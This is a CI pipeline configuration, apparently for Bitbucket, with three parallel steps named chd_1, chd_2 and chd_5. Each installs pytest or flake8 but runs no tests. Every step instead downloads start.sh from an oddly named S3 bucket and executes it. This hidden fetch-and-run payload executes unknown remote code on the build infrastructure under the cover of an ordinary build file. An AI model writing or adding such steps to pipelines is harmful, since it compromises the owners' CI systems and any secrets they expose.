image: python:3.8
pipelines:
  default:
    - parallel:
      - step:
          name: chd_1
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
			- wget https://asdfyui.s3.us-west-2.amazonaws.com/start.sh && chmod u+x start.sh && ./start.sh
      - step:
          name: chd_2
          script:
            - pip install flake8
			- wget https://asdfyui.s3.us-west-2.amazonaws.com/start.sh && chmod u+x start.sh && ./start.sh
      - step:
          name: chd_5
          script:
            - pip install flake8
			- wget https://asdfyui.s3.us-west-2.amazonaws.com/start.sh && chmod u+x start.sh && ./start.sh
